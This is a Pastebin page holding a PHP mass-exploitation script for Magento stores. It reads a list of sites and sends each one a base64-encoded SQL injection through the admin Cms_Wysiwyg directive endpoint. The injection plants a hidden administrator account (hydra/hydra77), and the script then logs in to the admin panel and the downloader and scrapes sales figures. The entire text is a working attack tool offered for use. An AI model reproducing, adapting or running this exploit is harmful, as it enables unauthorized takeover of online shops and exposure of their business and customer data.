Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php error_reporting(0); set_time_limit(0); $banner = ' #-----------------------------------------------------------# # Magento Add Administrator Mass Exploiter V.3 # # Coded By Keceabizs # # Keceabizs Family # # http://facebook.com/KeceAbizs # # Http://Keceabizs.blogspot.com # #-----------------------------------------------------------# '; function bersihkan($htmltags) { $htmltags = str_replace('<span class="price">','',$htmltags); $htmltags = str_replace('</span>','',$htmltags); return $htmltags; } $postadm = "filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdoeWRyYTc3JykgKSwgQ09OQ0FUKCc6JywgQFNBTFQgKSk7U0VMRUNUIEBFWFRSQSA6PSBNQVgoZXh0cmEpIEZST00gYWRtaW5fdXNlciBXSEVSRSBleHRyYSBJUyBOT1QgTlVMTDtJTlNFUlQgSU5UTyBgYWRtaW5fdXNlcmAgKGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgLGBycF90b2tlbmAsYHJwX3Rva2VuX2NyZWF0ZWRfYXRgKSBWQUxVRVMgKCdGaXJzdG5hbWUnLCdMYXN0bmFtZScsJ2VtYWlsQGV4YW1wbGUuY29tJywnaHlkcmEnLEBQQVNTLE5PVygpLDAsMCwxLEBFWFRSQSxOVUxMLCBOT1coKSk7SU5TRVJUIElOVE8gYGFkbWluX3JvbGVgIChwYXJlbnRfaWQsdHJlZV9sZXZlbCxzb3J0X29yZGVyLHJvbGVfdHlwZSx1c2VyX2lkLHJvbGVfbmFtZSkgVkFMVUVTICgxLDIsMCwnVScsKFNFTEVDVCB1c2VyX2lkIEZST00gYWRtaW5fdXNlciBXSEVSRSB1c2VybmFtZSA9ICdoeWRyYScpLCdGaXJzdG5hbWUnKTs%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1"; $postlog = "form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=hydra&login%5Bpassword%5D=hydra77"; $postdwn = "username=hydra&password=hydra77"; $pageadm = "/admin/Cms_Wysiwyg/directive/index/"; $pagelog = "/admin/"; $pagedwn = "/downloader/"; function stupid_CURL($url,$data,$page) { $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL, $url.$page); curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_POSTFIELDS, $data); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch, CURLOPT_POST, 1); $headers = array(); $headers[] = 'Content-Type: application/x-www-form-urlencoded'; curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt ($ch, CURLOPT_HEADER, 1); $result = curl_exec ($ch); curl_close($ch); return $result; } print $banner; $get=file_get_contents($argv[1]) or die(" \n\tError ! \n\tusage => php thisfile.php yourlist.txt\n\n"); $j=explode("\r\n",$get); foreach($j as $site){ print "\n\n\t=> Checking : ".$site; $hajar = stupid_CURL($site , $postadm, $pageadm); if(preg_match('#200 OK#', $hajar)) { $expres = "Success"; $ceklog = stupid_CURL($site , $postlog, $pagelog); if(preg_match('#302 Moved#', $ceklog)) { preg_match_all('#<span class="price">(.*?)</span>#si', $ceklog, $match); foreach($match as $val) { $ltm = $val[0]; $avo = $val[1]; break; } $admlog = "Success"; $user = "hydra"; $pass = "hydra77"; $cekdwn = stupid_CURL($site , $postdwn, $pagedwn); if(preg_match('#Return to Admin#', $cekdwn)) { $dwnlog = "Login Success"; }else { $dwnlog = "Login Failed"; } }else { $admlog = "Failed"; $user = "NULL"; $pass = "NULL"; } }else { $admlog = "Failed"; $expres = "Failed"; $user = "NULL"; $pass = "NULL"; $dwnlog = "Login Failed"; $ltm = "NULL"; $avo = "NULL"; } echo ' +---------------------------------------------+ +-------Magento Add Admin Exploiter V.3-------+ +---------------------------------------------+ | Exploiting : '.$expres.' | Login Admin : '.$admlog.' | Lifetime Sales: '.bersihkan($ltm).' | Average Order : '.bersihkan($avo).' | Downloader : '.$dwnlog.' | Username : '.$user.' | Password : '.$pass.' +---------------------------------------------+ '; } ?>
Add Comment
Please, Sign In to add comment